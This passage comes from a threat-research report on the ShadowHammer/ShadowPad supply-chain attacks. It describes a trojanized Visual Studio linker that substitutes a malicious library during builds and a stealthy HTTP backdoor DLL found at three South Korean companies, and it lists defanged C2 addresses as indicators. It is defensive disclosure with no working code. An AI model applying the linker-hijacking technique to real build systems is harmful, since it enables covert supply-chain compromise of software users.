While this does not indicate a strong connection to PlugX creators, the reuse of the algorithm is unusual and may suggest that the ShadowHammer developers had some experience with PlugX source code, and possibly compiled and used PlugX in some other attacks in the past.

Compromising software developers

All of the analyzed ASUS Live Updater binaries were backdoored using the same executable file patched by an external malicious application, which implemented malware injection on demand. After that, the attackers signed the executable and delivered it to the victims via ASUS update servers, which was detected by Kaspersky Lab products.

However, in the non-ASUS cases, the malware was seamlessly integrated into the code of recently compiled legitimate applications, which suggests that a different technique was used. Our deep search revealed another malware injection mechanism, which comes from a trojanized development environment used by software coders in the organization.

In late 2018, we found a suspicious sample of the link.exe tool uploaded to a public malware scanning service. The tool is part of Microsoft Visual Studio, a popular integrated development environment (IDE) used for creating applications for Microsoft Windows. The same user also uploaded digitally signed compromised executables and some of the backdoors used in the same campaign.

The attack consists of an infected Microsoft Incremental Linker and a malicious DLL module that gets loaded through the compromised linker. The malicious DLL then hooks the file open operation and redirects attempts to open a commonly used C++ runtime library during the process of static linking. The redirect destination is a malicious .lib file, which gets linked with the target software instead of the legitimate library. The code also carefully checks which executable is being linked and applies the file redirection only if the name matches the hardcoded target file name.

So, was it a developer from a videogame company that installed the trojanized version of the development software, or did the attackers deploy the Trojan code after compromising the developer’s machine? This currently remains unknown. While we could not identify how the attackers managed to replace key files in the integrated development environment, this should serve as a wake-up call to all software developers. If your company produces software, you should ask yourself:

  1. Where does my development software come from?
  2. Is the delivery process (download) of IDE distributions secure?
  3. When did we last check the integrity of our development software?

Other victims

During the analysis of samples related to the updated ShadowPad arsenal, we discovered one unusual backdoor executable (md5: 092ae9ce61f6575344c424967bd79437). It comes as a DLL installed as a service that indirectly listens to TCP port 80 on the target system and responds to a specific URL schema, registered with Windows HTTP Service API: http://+/requested.html. The malware responds to HTTP GET/POST requests using this schema and is not easy to discover, which can help it remain invisible for a long time.

Based on the malware’s network behavior, we identified three further, previously unknown victims: a videogame company, a conglomerate holding company and a pharmaceutical company, all based in South Korea, which responded with a confirmation to the malware protocol, indicating compromised servers. We are in the process of notifying the victim companies via our local regional channels. Considering that this type of malware is custom and not widely used, we believe that the same threat actor or a related group is behind these further compromises. This expands the list of previously known usual targets.

Conclusions

While attacks on supply chain companies are not new, the current incident is a big landmark in the cyberattack landscape. Not only does it show that even reputable vendors may suffer from the compromise of digital certificates, but it raises many concerns about the software development infrastructure of all other software companies. ShadowPad, a powerful threat actor, previously concentrated on hitting one company at a time. Current research revealed at least four companies compromised in a similar manner, with three more suspected to have been breached by the same attacker. How many more companies are compromised out there is not known. What is known is that ShadowPad succeeded in backdooring developer tools and, one way or another, injected malicious code into digitally signed binaries, subverting trust in this powerful defense mechanism.

Does it mean that we should stop trusting digital signatures? No. But we definitely need to investigate all strange or anomalous behavior, even by trusted and signed applications. Software vendors should introduce another stage in their build pipeline that additionally checks their software for potential malware injections, even after the code is digitally signed.

At this unprecedented scale of operations, it is still a mystery why the attackers reduced the impact by limiting payload execution to 600+ victims in the case of ASUS. We are also unsure who the ultimate victims were or where the attackers had collected the victims’ MAC addresses from. If you believe you are one of the victims, we recommend checking your MAC address using this free tool or online check website. And if you discover that you have been targeted by this operation, please email us at shadowhammer@kaspersky.com.

We will keep tracking the ShadowPad activities and inform you about new findings!

Indicators of compromise

C2 servers:

  • 103.19.3[.]17
  • 103.19.3[.]43
  • 103.19.3[.]44
  • 117.16.142[.]9
  • 23.236.77[.]175
  • 23.236.77[.]177

Malware samples and trojanized files:
